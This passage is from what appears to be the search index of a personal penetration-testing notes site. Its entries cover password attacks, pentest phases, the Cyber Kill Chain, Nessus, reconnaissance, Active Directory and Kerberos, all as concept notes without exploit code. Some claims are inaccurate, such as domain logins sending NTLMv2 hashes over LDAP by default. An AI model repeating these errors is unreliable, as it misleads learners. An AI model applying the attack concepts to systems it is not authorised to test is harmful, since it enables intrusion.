attacks:\u003c/h2\u003e\n\u003cp\u003e\u003cem\u003eOBJECTIVES:\u003c/em\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eGaining unauthorized access to remote hosts on a network by performing attacks against its authentication system\u003c/li\u003e\n\u003cli\u003eRetrieving the password associated with cryptographic hashes\u003c/li\u003e\n\u003cli\u003eRetrieving the password to access a password-protected sensitive file\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003ch2 id=\"different-types-of-password-attacks\"\u003eDifferent types of password attacks:\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eBrute-force attack\u003c/code\u003e: In a brute-force attack, every possible combination is tried against the system. This is a very time-consuming process as every possible password combination is tested against the authentication system of the target until the valid password is retrieved. While this method may seem to be the best method, the time constraints given for completing a penetration test are often not achievable.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eDictionary attack\u003c/code\u003e: In a dictionary attack, the threat actor uses a pre-populated wordlist that contains thousands or even millions of candidate passwords. These are tested against the authentication system of the target. Each word from the wordlist is tested; however, the attack will not be successful if a valid password is not found within the wordlist being used by the threat actor.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePassword guessing\u003c/code\u003e: This is a common technique that’s used by many people, even threat actors and penetration testers, who are attempting to gain unauthorized access to a system. I have often seen IT professionals use simple and even default passwords on their networking devices, security appliances, and even the client and server systems within their organization. For instance, by performing a Google dork using common default passwords, you will easily find default passwords for various systems. These default passwords are set by the manufacturer of the device.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePassword cracking\u003c/code\u003e: In this technique, the threat actor uses various tools and techniques to retrieve valid user credentials to gain unauthorized access to a system. Sometimes, a threat actor may capture a user’s password in transit across a network in plaintext by an unsecure network protocol, or even retrieve the cryptographic hash of a password.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePassword spraying\u003c/code\u003e: This is the technique where a threat actor uses a single password and tests it against an authentication system with different usernames. The password is a guessable password, obtained from data breaches or a wordlist. The idea is to test which user account within a specific list uses the same password. This technique is good when testing which users\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eCredential stuffing\u003c/code\u003e: This technique allows a threat actor to use a common wordlist of usernames and passwords against the authentication system of a target host. This technique checks which combination of usernames and passwords leads to valid user credentials.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eOnline password attack\u003c/code\u003e: In an online password attack, the threat actor attempts to gain unauthorized access to a host that is running a network service or a remote access service. This allows authorized users to log in to the system across a network. A simple example of an online password attack is a threat actor attempting to retrieve the username and password of a valid user to gain access to a server that is running the \u003ccode\u003eRemote Desktop Protocol (RDP)\u003c/code\u003e. Keep in mind that online password attacks focus on using a combination of passwords from a wordlist directly on a web login page or network service interface until the correct one is found.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eOffline password attack\u003c/code\u003e: In an offline password attack, the threat actor uses various tools and techniques to retrieve the valid password of a password-protected file, such as a document, or even the cryptographic hash of a user’s password. A simple example of this is capturing a domain administrator’s username and password hash from network packets. The username is usually in plaintext but you may need/want to retrieve the password from the hash value.\u003c/li\u003e\n\u003c/ul\u003e\n\n            \u003clink rel=\"stylesheet\" href=\"/css/vendors/admonitions.4fd9a0b8ec8899f2ca952048d255a569f433f77dfb3f52f5bc87e7d65cdce449.css\" integrity=\"sha256-T9mguOyImfLKlSBI0lWlafQz9337P1L1vIfn1lzc5Ek=\" crossorigin=\"anonymous\"\u003e\n    \u003cdiv class=\"admonition important\"\u003e\n      \u003cdiv class=\"admonition-header\"\u003e\u003csvg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 512 512\"\u003e\u003cpath d=\"M256 512A256 256 0 1 0 256 0a256 256 0 1 0 0 512zm0-384c13.3 0 24 10.7 24 24l0 112c0 13.3-10.7 24-24 24s-24-10.7-24-24l0-112c0-13.3 10.7-24 24-24zM224 352a32 32 0 1 1 64 0 32 32 0 1 1 -64 0z\"/\u003e\u003c/svg\u003e\n        \u003cspan\u003eImportant\u003c/span\u003e\n      \u003c/div\u003e\n      \u003cdiv class=\"admonition-content\"\u003e\n        \u003cp\u003eSecLists is a collection of pre-built wordlists containing passwords and usernames that are commonly used by penetration testers to perform both online and offline dictionary attacks. Furthermore, SecLists contains URLs, sensitive data patterns, and fuzzing payloads, which are valuable to penetration testers. You can find the SecLists collections at \u003ca href=\"https://github.com/danielmiessler/SecLists\"\u003ehttps://github.com/danielmiessler/SecLists\u003c/a\u003e. Additionally, you can use the wordlists command within Kali Linux to view the local wordlist repository that is already pre-loaded within the operating system\u003c/p\u003e","title":"Introduction to Network Penetration Testing"},{"content":"• Introduction to network penetration testing • Working with bind and reverse shells • Antimalware evasion techniques • Working with wireless adapters • Managing and Monitoring wireless modes\nThe following are typical phases of network penetration testing:\nDefining the scope: The scope provides a clear understanding of which systems and networks are to be tested and whether specific tools or techniques are restricted. Performing reconnaissance: This is the information-gathering phase, where the penetration tester performs both passive and active reconnaissance on the target. Scanning and enumeration: The scanning and enumeration phase is commonly used to collect specific details and information about the target such as open ports, running services, and operating systems, and identify user accounts, network shares, and configurations on targeted systems. Vulnerability analysis: During this phase, the penetration tester analyzes the collected data from the previous phases to identify any potential security vulnerabilities on the target, determine their severity and risk rating, and identify countermeasures to help the organization improve their cyber defenses. Exploitation: In this phase, the ethical hacker or penetration tester attempts to exploit each security vulnerability found on a targeted system using both manual and automated techniques to determine whether the security vulnerability actually exists and gain a foothold on the target. Post-exploitation: Once a targeted system is compromised, the penetration tester will attempt to expand their foothold further into the compromised system and onto other systems within scope. During this phase, the penetration tester can identify additional security vulnerabilities on the target. Reporting: This is one of the most important phases during any penetration test. The penetration tester is required to provide a detailed technical and executive report to the stakeholders of the targeted organization with information about the security assessment, the techniques used to discover the security vulnerabilities, the security vulnerabilities that were found, and recommendations on how to improve the security posture of the targeted system. Remediation: Based on the information in the report, the organization can implement the necessary steps needed to remediate the identified security vulnerabilities on the targeted system. The process may involve applying security controls and patches and improving the configuration of systems and devices. Some examples of security controls may include network segmentation, encryption, access controls, and intrusion detection systems (IDSs). The vulnerability rating and severity should be used to help organizations prioritize higher-risk vulnerabilities and allocate resources to remediate them. Penetration testing encompasses a broad range of activities beyond identifying patch management inefficiencies. These activities include testing application-layer vulnerabilities, network-layer vulnerabilities, and human-based (social engineering) vulnerabilities. In addition, this helps organizations thoroughly assess their cyber defenses and determine whether their systems, networks and infrastructure are compliant with various industry standards and frameworks. For instance, organizations that process a payment card system are required to be Payment Card Industry Data Security Standard (PCI DSS)-compliant to protect sensitive data during a payment transaction. ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/06-understading-network-pentesing/00-intro/","summary":"\u003cp\u003e• Introduction to network penetration testing\n• Working with bind and reverse shells\n• Antimalware evasion techniques\n• Working with wireless adapters\n• Managing and Monitoring wireless modes\u003c/p\u003e\n\u003chr\u003e\n\u003cp\u003eThe following are typical phases of network penetration testing:\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003e\u003ccode\u003eDefining the scope\u003c/code\u003e: The scope provides a clear understanding of which systems and networks are to be tested and whether specific tools or techniques are restricted.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePerforming reconnaissance\u003c/code\u003e: This is the information-gathering phase, where the penetration tester performs both passive and active reconnaissance on the target.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eScanning and enumeratio\u003c/code\u003en: The scanning and enumeration phase is commonly used to collect specific details and information about the target such as open ports, running services, and operating systems, and identify user accounts, network shares, and configurations on targeted systems.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eVulnerability analysis\u003c/code\u003e: During this phase, the penetration tester analyzes the collected data from the previous phases to identify any potential security vulnerabilities on the target, determine their severity and risk rating, and identify countermeasures to help the organization improve their cyber defenses.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eExploitation\u003c/code\u003e: In this phase, the ethical hacker or penetration tester attempts to exploit each security vulnerability found on a targeted system using both manual and automated techniques to determine whether the security vulnerability actually exists and gain a foothold on the target.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePost-exploitation\u003c/code\u003e: Once a targeted system is compromised, the penetration tester will attempt to expand their foothold further into the compromised system and onto other systems within scope. During this phase, the penetration tester can identify additional security vulnerabilities on the target.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eReporting\u003c/code\u003e: This is one of the most important phases during any penetration test. The penetration tester is required to provide a detailed technical and executive report to the stakeholders of the targeted organization with information about the security assessment, the techniques used to discover the security vulnerabilities, the security vulnerabilities that were found, and recommendations on how to improve the security posture of the targeted system.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eRemediation\u003c/code\u003e: Based on the information in the report, the organization can implement the necessary steps needed to remediate the identified security vulnerabilities on the targeted system. The process may involve applying security controls and patches and improving the configuration of systems and devices. Some examples of security controls may include network segmentation, encryption, access controls, and intrusion detection systems (IDSs). The vulnerability rating and severity should be used to help organizations prioritize higher-risk vulnerabilities and allocate resources to remediate them.\u003c/li\u003e\n\u003c/ol\u003e\n\u003chr\u003e\n\u003cul\u003e\n\u003cli\u003ePenetration testing encompasses a broad range of activities beyond identifying patch management inefficiencies. These activities include testing application-layer vulnerabilities, network-layer vulnerabilities, and human-based (social engineering) vulnerabilities.\u003c/li\u003e\n\u003cli\u003eIn addition, this helps organizations thoroughly assess their cyber defenses and determine whether their systems, networks and infrastructure are compliant with various industry standards and frameworks. For instance, organizations that process a payment card system are required to be \u003ccode\u003ePayment Card Industry Data Security Standard (PCI DSS)\u003c/code\u003e-compliant to protect sensitive data during a payment transaction.\u003c/li\u003e\n\u003c/ul\u003e","title":"Introduction to Network Pentesting"},{"content":"Post-exploitation is the phase that occurs after an attacker or penetration tester has successfully compromised a system. Unlike the initial exploitation stage, which focuses on gaining entry, post-exploitation is about leveraging that access to achieve specific objectives. Post- exploitation refers to all the operations that are performed after gaining initial access to the target system. It is done to further gain control of the target system and network.\nDetailed intro coming soon\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/08-post-exploitation-techniques/00-intro/","summary":"\u003cp\u003e\u003ccode\u003ePost-exploitation\u003c/code\u003e is the phase that occurs after an attacker or penetration tester has successfully compromised a system. Unlike the initial exploitation stage, which focuses on gaining entry, post-exploitation is about leveraging that access to achieve specific objectives. Post- exploitation refers to all the operations that are performed after gaining initial access to the target system. It is done to further gain control of the target system and network.\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eDetailed intro coming soon\u003c/em\u003e\u003c/p\u003e","title":"Introduction to Post Exploitation"},{"content":"I forgot the username and password for my nessus setup, so here are the steps to troubleshoot the issues:\n# This command will show the existing usernames on your machine sudo /opt/nessus/sbin/nessuscli lsuser # changing the passweord for a particular username sudo /opt/nessus/sbin/nessuscli chpasswd 0xdf_fak3r Give a new password and you are good to go, navigate to the portal of nessus -\u0026gt; nessus\nScanning with nessus: Start the nessus service using the command sudo /bin/systemctl start nessusd.service , then navigate to https://kali:8834 After login, click on the new scan button: Select advance scan from the options: Fill out this basic details first , and setup the target Ip You can customize other settings also, then hit save and Launch. Scan analysis: List of security vulnerabilities.\nClick on any of the vulns: As shown in the preceding screenshot, Nessus also provides the Common Vulnerability Scoring System (CVSS) base score, which is based on a rating from 0-10, where 10 is the most critical and requires immediate attention. Important Cybersecurity professionals within the industry use the CVSS calculator at https://www.first.org/cvss/ to determine the score of vulnerabilities within their systems, networks, and organizations. This calculation helps experts determine the risk factors when determining a severity rating.\n3. We can further export the results of the scan into different formats.\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/05-vulnerability-assessment/00-nessus/","summary":"\u003cp\u003eI forgot the username and password for my \u003ccode\u003enessus\u003c/code\u003e setup, so here are the steps to troubleshoot the issues:\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# This command will show the existing usernames on your machine\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo /opt/nessus/sbin/nessuscli lsuser\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# changing the passweord for a particular username\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo /opt/nessus/sbin/nessuscli chpasswd 0xdf_fak3r\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eGive a new password and you are good to go, navigate to the portal of \u003ccode\u003enessus\u003c/code\u003e -\u0026gt; \u003ca href=\"https://kali:8834\"\u003enessus\u003c/a\u003e\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"scanning-with-nessus\"\u003eScanning with nessus:\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eStart the \u003ccode\u003enessus\u003c/code\u003e service using the command \u003ccode\u003esudo /bin/systemctl start nessusd.service \u003c/code\u003e , then navigate to \u003ccode\u003ehttps://kali:8834\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAfter login, click on the \u003ccode\u003enew scan\u003c/code\u003e button:\n\u003cimg alt=\"nessus_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/VA/00/nessus_1.png\"\u003e\u003c/li\u003e\n\u003cli\u003eSelect \u003ccode\u003eadvance scan\u003c/code\u003e from the options:\n\u003cimg alt=\"nessus_2\" loading=\"lazy\" src=\"/images/Pentesting/NP/VA/00/nessus_2.png\"\u003e\u003c/li\u003e\n\u003cli\u003eFill out this basic details first , and setup the target Ip\n\u003cimg alt=\"nessus_3\" loading=\"lazy\" src=\"/images/Pentesting/NP/VA/00/nessus_3.png\"\u003e\u003c/li\u003e\n\u003cli\u003eYou can customize other settings also, then hit save and Launch.\n\u003cimg alt=\"nessus_4\" loading=\"lazy\" src=\"/images/Pentesting/NP/VA/00/nessus_4.png\"\u003e\u003c/li\u003e\n\u003c/ol\u003e\n\u003chr\u003e\n\u003ch3 id=\"scan-analysis\"\u003eScan analysis:\u003c/h3\u003e\n\u003cp\u003e\u003cimg alt=\"nessus_5\" loading=\"lazy\" src=\"/images/Pentesting/NP/VA/00/nessus_5.png\"\u003e\nList of security vulnerabilities.\u003c/p\u003e","title":"Nessus"},{"content":"Penetration Testing basics: Pre-engagement: NDA: An NDA is a legal agreement that specifies that a penetration tester and their employer will not share or hold onto any sensitive or proprietary information that is encountered during the assessment.\nRoE: The scope of a penetration test, also known as the rules of engagement, defines the systems the penetration tester can and cannot hack. This ensures the penetration tester remains within legal boundaries.\nThe following are some sample pre-engagement questions to help you define the scope of a penetration test: • What is the size/class of your external network? (Network penetration testing) • What is the size/class of your internal network? (Network penetration testing) • What is the purpose and goal of the penetration test? (Applicable to any form of penetration testing) • How many pages does the web application have? (Web application penetration testing) • How many user inputs or forms does the web application have?\nInformation Gathering: Penetration testing involves information gathering, which is vital to ensure that penetration testers have access to key information that will assist them in conducting their assessment. Seasoned professionals normally spend a day or two conducting extensive reconnaissance on their target. The more knowledge that is known about the target will help the penetration tester to identify the attack surface such as points of entry in the target\u0026rsquo;s systems and networks.\nThreat modeling: Threat modeling is a process used to assist penetration testers and network security defenders to better understand the threats that inspired the assessment or the threats that the application or network is most prone to. This data is then used to help penetration testers simulate, assess, and address the most common threats that the organization, network, or application faces.\nThe following are some threat modeling frameworks: • Spoofing, Tampering, Repudiation, Information disclosure, Denial of server and Elevation of privilege (STRIDE) • Process for Attack Simulation and Threat Analysis (PASTA)\nVulnerability Analysis: Vulnerability analysis typically involves the assessors or penetration testers running vulnerability or network/port scans to better understand which services are on the network or the applications running on a system and whether there are any vulnerabilities in any systems included in the scope of the assessment. This process often includes manual vulnerability discovery and testing, which is often the most accurate form of vulnerability analysis or vulnerability assessment.\nExploitation: Exploitation is the ammunition or evidence that helps articulate why the vulnerability matters and illustrates the impact that the vulnerability could have on the organization. Furthermore, without exploitation, the assessment is not a penetration test and is nothing more than a vulnerability assessment.\nPost-exploitation: The process of post-exploitation is the continuation of this step, where the foothold gained is leveraged to access data or spread to other systems via lateral movement techniques within the target network. During post-exploitation, the primary goal is typically to demonstrate the impact that the vulnerability and access gained can pose to the organization. This impact assists in helping executive leadership to better understand the vulnerabilities and the damage it could cause to the organization if a real cyber-attack was to occur.\nReport writing: Report writing involves much more than listing a few vulnerabilities discovered during the assessment. It is the medium through which you convey risk and business impact, summarize your findings, and include remediation steps. A good penetration tester needs to be a good report writer, or the issues they find will be lost and may never be understood by the client who hired them to conduct the assessment.\nApproaches of penetration testing: Black Box - Negligible information is provided. White Box - Much more information is provided during the pen test. Grey Box - Hybrid approach. Phases of hacking: How a hacker approaches a target: Reconaissance/information gathering: The reconnaissance or information gathering phase is where the threat actor focuses on acquiring meaningful information about their target. This is the most important phase in hacking: the more details known about the target, the easier it is to compromise a weakness and exploit it.\nScanning and enumeration: The second phase of hacking is scanning. Scanning involves using a direct approach in engaging the target to obtain information that is not accessible via the reconnaissance phase. Techniques: • Checking for any live systems • Checking for firewalls and their rules • Checking for open network ports • Checking for running services • Checking for security vulnerabilities • Creating a network topology of the target network\nGaining access: This phase can sometimes be the most challenging phase of them all. In this phase, the threat actor uses the information obtained from the previous phases to exploit the target. Upon successful exploitation of vulnerabilities, the threat actor can then remotely execute malicious code on the target and gain remote access to the target system. The following can occur once access is gained: • Password cracking • Exploiting vulnerabilities • Escalating privileges • Hiding files\nMaintaining access: After exploiting a system, the threat actor should usually ensure that they are able to gain access to the victim\u0026rsquo;s system at any time as long as the system is online. This is done by creating backdoor access to the target and setting up multiple persistence connections between the attacker\u0026rsquo;s machines and the victim\u0026rsquo;s system. The objectives of maintaining access are as follows: • Lateral movement • Exfiltration of data • Creating backdoor and persistent connections\nCovering tracks: The last phase is to cover your tracks. This ensures that you do not leave any traces of your presence on a compromised system or network. As penetration testers, we would like to be as undetectable as possible on a target\u0026rsquo;s network, not triggering any alerts on security sensors and appliances while we remove any residual traces of the actions performed during the penetration test. Covering your tracks ensures that you don\u0026rsquo;t leave any trace of your presence on the network, as a penetration test is designed to be stealthy and simulate real-world attacks on an organization.\nThe cyber kill chain framework: The Cyber Kill Chain is a seven-stage framework developed by Lockheed Martin, an American aerospace corporation. This framework outlines each critical step a threat actor will need to perform before they are successful in meeting the objectives and goals of the cyber-attack against their targets. Reconnaissance: As with every battle plan, it\u0026rsquo;s important to know a lot about your opponent before starting a war. The reconnaissance stage is focused on gathering a lot of information and intelligence about the target, whether it\u0026rsquo;s a person or an organization.\nImportant The reconnaissance stage involves both passive and active information gathering techniques, which will be covered in later sections of this book. You will also discover tools and techniques to improve your information skills when performing a penetration testing engagement.\nWeaponization: Using the information gathered from the reconnaissance phase, the threat actor and penetration tester can use it to better craft a weapon, better referred to as an exploit, that can take advantage of a security vulnerability on the target. The weapon (exploit) has to be specially crafted and tested to ensure its success when launched by the threat actor or the penetration tester. The objective of the exploit is to affect the confidentiality, integrity, and/or availability of the target\u0026rsquo;s systems or networks.\nDelivery: After creating the weapon, the threat actor or the penetration tester has to deliver the weapon onto the target system. Delivery can be done using the creative mindset of the attacker, whether using email messaging, instant messaging services, or even by creating drive-by downloads on compromised web services. Another technique can be copying the exploit onto multiple USB drives and dropping them within the compound of the target organization(evasdropping), with the hope an employee will find it and connect it to an internal system due to human curiosity.\nWe can use USB Ninja cables , or we can make them by our own. We can also use rubber duckies for attacks like evasdropping. Exploitation: After the weapon (exploit) is delivered to the target, the attacker needs to ensure when the exploit is executed, it successfully takes advantage of the security vulnerability on the target system as intended. If the exploit does not work, the threat actor or penetration tester may be detected by the organization\u0026rsquo;s blue team and there is a halt in the Cyber Kill Chain. The attacker needs to ensure the exploit is tested properly before executing it on the target system.\nInstallation: After the threat actor has exploited the target system, the attacker will attempt to create multiple persistent backdoor accesses to the compromised system. This allows the threat actor or the penetration tester to have multiple channels of entry back into the system and network. During this stage, additional applications may usually install while the threat actor takes a lot of precautions to avoid detection by any threat detection systems.\nCommand and control server(c2): An important stage in a cyber-attack is creating Command and Control (C2) connections between the compromised systems and a C2 server on the internet. This allows the threat actor to centrally control a group of infected systems (botnet) using a C2 server that is managed by the attacker. This allows the threat actor to create an army of zombies, all controlled and managed by a single threat actor. Actions and objectives: If the threat actor or the penetration tester is able to reach this stage of the Cyber Kill Chain, the organization\u0026rsquo;s blue team has failed to stop the attacker and prevent the cyberattack. At this stage, the threat actor has completed their objectives and achieved the goals of the attack. In this phase, the attacker can complete the main objective of the attack, whether it\u0026rsquo;s exfiltrating data from the organization and selling it on the dark web or even extending their botnet for a larger-scale cyber-attack on another target organization. Stopping the threat actor or the penetration tester at this phase is considered to be extremely difficult as the attacker would have already established multiple persistent backdoor accesses with encrypted C2 connections on multiple compromised systems within the target organization. Furthermore, the threat actor will also be clearing traces of any evidence or artifacts that could help cybersecurity professionals to trace the attack to the threat actor.\nDefending-architecture-whitepapers\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/00-intro-to-hacking/00-penetration-testing-phases/","summary":"\u003ch2 id=\"penetration-testing-basics\"\u003ePenetration Testing basics:\u003c/h2\u003e\n\u003cp\u003e\u003cimg alt=\"pp_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/pp/PP_1.png\"\u003e\u003c/p\u003e\n\u003ch3 id=\"pre-engagement\"\u003ePre-engagement:\u003c/h3\u003e\n\u003cp\u003e\u003cimg alt=\"pp_2\" loading=\"lazy\" src=\"/images/Pentesting/NP/pp/PP_2.png\"\u003e\n\u003cem\u003eNDA:\u003c/em\u003e An NDA is a legal agreement that specifies that a penetration tester and their employer will not share or hold onto any sensitive or proprietary information that is encountered during the assessment.\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eRoE:\u003c/em\u003e The scope of a penetration test, also known as the rules of engagement, defines the systems the penetration tester can and cannot hack. This ensures the penetration tester remains within legal boundaries.\u003c/p\u003e","title":"Penetration Testing Phases"},{"content":"Without performing reconnaissance (information gathering) on the target, both threat actors and penetration testers will have difficulties moving on to the later phases of the Cyber Kill Chain. Hence, ethical hackers and penetration testers must conduct extensive research into gathering as much information as possible to create a profile of their target. Reconnaissance can be divided into two categories: • Passive: Uses an indirect approach and does not engage the target to gather information. • Active: Directly engages the target to gather specific details.\nFootprinting: Footprinting is part of the reconnaissance phase; however, since footprinting can provide more specific details about the target, we can consider footprinting to be a subset of the reconnaissance phase.\nFollow the footprints!!!! Footprinting allows a penetration tester to understand the security posture of the target infrastructure, quickly identify security vulnerabilities on the target systems and networks, create a network map of the organization, and reduce the area of focus to the specific IP addresses, domain names, and the types of devices regarding which information is required. Collecting network information (domain names, IP addressing schemes, and network protocols) Collecting system information (user and group names, routing tables, and system names) Collecting organization information (employee details, company directory, and location details) Difference between Recon and footprinting: Despite of being the subset of Reconnaissance , foot printing goes a lot deeper for gathering information without actively interacting with the target. Technically if we compare passive recon with footprinting it will make a lot more sense. In passive recon we just look for basic information that are available online on a surface level, footprinting take it a step further , i will show some useful steps to do deeper footprinting:\n• Checking search engines such as Yahoo, Bing, and Google • Performing Google hacking/dorking techniques (advanced Google searches) • Information gathering through social media platforms such as Facebook, LinkedIn, Instagram, and Twitter • Footprinting the company\u0026rsquo;s website • Performing email footprinting techniques • Using WHOIS databases to retrieve domain information • Performing Domain Name System (DNS) footprinting • Network footprint techniques • Social engineering techniques Try to use as much as OSINT techniques as you can on a deeper level by taking and forwarding a good level info, no info is less, everything counts.\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/02-reconnaissance/00-reconnaisance-basics/","summary":"\u003cp\u003eWithout performing reconnaissance (information gathering) on the target, both threat actors and penetration testers will have difficulties moving on to the later phases of the Cyber Kill Chain. Hence, ethical hackers and penetration testers must conduct extensive research into gathering as much information as possible to create a profile of their target.\nReconnaissance can be divided into two categories:\n• Passive: Uses an indirect approach and does not engage the target to gather information.\n• Active: Directly engages the target to gather specific details.\u003c/p\u003e","title":"Reconnaissance Basics"},{"content":"For example, imagine you need to change a user’s password on their user account and there are over 100 devices in the network – this can be very challenging. Within Microsoft Windows Server, you will find many roles and features that can be installed and configured to help IT professionals provide many services and resources to everyone on a network. One such service within Microsoft Windows Server is known as Active Directory. This is a directory service that helps IT professionals centrally manage the users, groups, devices, and policies within the organization.\nImportant Active Directory stores information about objects on the network and makes this information easy for administrators and users to find and use. Active Directory uses a domain to manage a forest of domains, providing scalable, secure, and manageable infrastructure for user and resource management.\nWith Active Directory running on the network, devices will need to join the Windows domain that is managed by a domain controller. This allows individuals to log in to devices on the domain using their domain user account rather than a local user account stored on an isolated computer. Active Directory allows the following centralized management and security functions to be used:\nManagement of user profiles on clients and servers on the domain. Management of network information and configurations. Centralized management of security policies for users, groups, and devices on the domain. Clients’ registry configurations and policies. When setting up Active Directory on Microsoft Windows Server, you will need to create a forest that defines the logical security boundary for managing the users, groups, and devices of an organization. Within a forest, there can be many domains. A domain is a collection of Organizational Units (OUs) used to organize objects. A forest in Active Directory is essentially a collection of one or more domains that share a common configuration, schema, and global catalog. The term forest is commonly used to represent the highest level of an organization within Active Directory. It also defines both the administrative and security boundaries of an entire directory infrastructure.\nThe following are the default supported objects that can be placed within an OU on Active Directory:\nUsers Computers Groups OUs Printers Shared folders An OU is like creating a folder inside our computer and placing items(objects) that share a common factor, such as user accounts of people who work within the same department like CSE/IT/Management etc. This allows us to centrally manage the users, groups , computers etc.\nA group allows you to assign user accounts to a group for easier security management, which means you can create a security policy using a GPO and assign that GPO to the group. Therefore, all users who are members of the group will be affected by the GPO. This is usually for creating and assigning security restrictions to users of a particular department or section within the organization.\nA tree is when there are multiple domains within the same forest in AD. Trees help Domain Admins create logical security boundaries between each domain within the forest itself. Multiple domains can exist within a single forest or multiple forests, which means that IT professionals can configure various types of trust within Active Directory. Implementing a trust model allows users from one domain or forest to access resources in another domain or forest. The concept of trust is especially important for large enterprise organizations.\nTRUST MODELS INSIDE ACTIVE DIRECTORY:\nOne way trust: Imagine that users within Domain_A can access the resources within Domain_B, but users within Domain_B cannot access the resources within Domain_A. Two way trust: When using this trust model, users in both trusting and trusted domains can access resources within each other’s domain, so users within Domain_A can access the resources within Domain_B and vice versa. Transitive Trust: Extending trust - With transitive trust, trust can be extended from one domain to another domain within the same forest. So, transitive trust can be extended from Domain_A to Domain_B, to Domain_C, and so on. By default, transitive trust between domains of the same forest is the same as two-way trust. Non transitive trust: This type of trust does not extend to other domains within the same forest, but it can be either two-way trust or one-way trust. Remember that non-transitive trust is the default model between two different domains located in different forests, where the forests do not have a trust relationship. Forest trust: This type of trust is created between the forest root domain between different forests and can be either one-way trust or two-way trust, with transitive or non-transitive trust. For penetration testers and ethical hackers, it is important to understand the domain login process. When a user attempts to log in to the domain, the following process occurs:\nThe host sends the user’s domain username and the New Technology LAN Manager (NTLM) version 2 hash of the user’s password to the domain controller during the authentication process to validate the identity of the user (remember our pass-the-hash attacks?). The domain controller determines whether the user credentials are valid. The domain controller responds to the host, by defining the security policies to apply to the user (network authentication). This means that a user with a valid domain user account can log in to any permitted device on the network, so long as the security policy permits that action. When a local user account is created on a Windows 10/11 operating system, the user’s credentials are stored within the Security Account Manager (SAM) file located in the local machine’s C:\\Windows\\ System32\\config directory. The username is stored in plaintext while the password is converted into an NTLM version 1 hash stored in the SAM file. However, when a user is attempting to authenticate on a host within a domain, the host sends the domain username and NTLM version 2 password hash to the domain controller using the Lightweight Directory Access Protocol (LDAP) by default (an unsecure directory protocol used to perform queries on a directory server such as a domain controller over a network).\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/10-active-directory-attacks/00-understanding-active-directory/","summary":"\u003cp\u003eFor example, imagine you need to change a user’s password on their user account and there are over 100 devices in the network – this can be very challenging. Within Microsoft Windows Server, you will find many roles and features that can be installed and configured to help IT professionals provide many services and resources to everyone on a network. One such service within Microsoft Windows Server is known as Active Directory. This is a directory service that helps IT professionals centrally manage the users, groups, devices, and policies within the organization.\u003c/p\u003e","title":"Understanding Active Directory"},{"content":"Kerberos is a network authentication protocol that runs on Windows Server, which enables clients to authenticate on the network and access services within the Windows domain. Kerberos provides single sign-on (SSO), which allows a user to authenticate once on a network and access resources without having to re-enter their user credentials each time they need to access a new resource, such as a mapped network drive. Kerberos supports delegated authentication, which allows a service running on a client’s computer to act on behalf of the authenticated domain user when it connects to other services on the network. Kerberos supports interoperability, which allows a Windows-based operating system to work in other networks that also use Kerberos as their authentication mechanism. When using Kerberos on a network, it supports mutual authentication, which allows two devices to validate the identity of each other.\nWhat is SSO: Single Sign-On (SSO) is an authentication method that allows users to log in to multiple applications with a single set of credentials, eliminating the need to remember multiple usernames and passwords. When a user logs in to an identity provider (IdP), the IdP issues an authentication token, which grants access to all linked applications (service providers) without requiring a separate login for each.\nWhat is delegated auth: Delegated authentication is a process where a user's login credentials are authenticated by a third-party identity provider (IdP) instead of the application they are trying to access. The application \u0026ldquo;delegates\u0026rdquo; the authentication task to another service, like an Active Directory or LDAP server, which verifies the user\u0026rsquo;s credentials and returns a token to grant access. This approach enhances security and user experience by leveraging existing credentials and potentially building on single sign-on (SSO) principles. source: GOOGLE\nwithin AD environment there are 3 main elements when working with kerberos:\nClient: A domain user who logs in to a client computer to access a resource, such as a file server or application server Key distribution center (KDC): This is the domain controller that is running Kerberos and Active Directory Application server: This is usually a server on the domain that is hosting a service or resource Kerberos authentication process: It appears you don't have a PDF plugin for this browser. No biggie... you can click here to download the PDF file.\nYou can follow this pdf for different 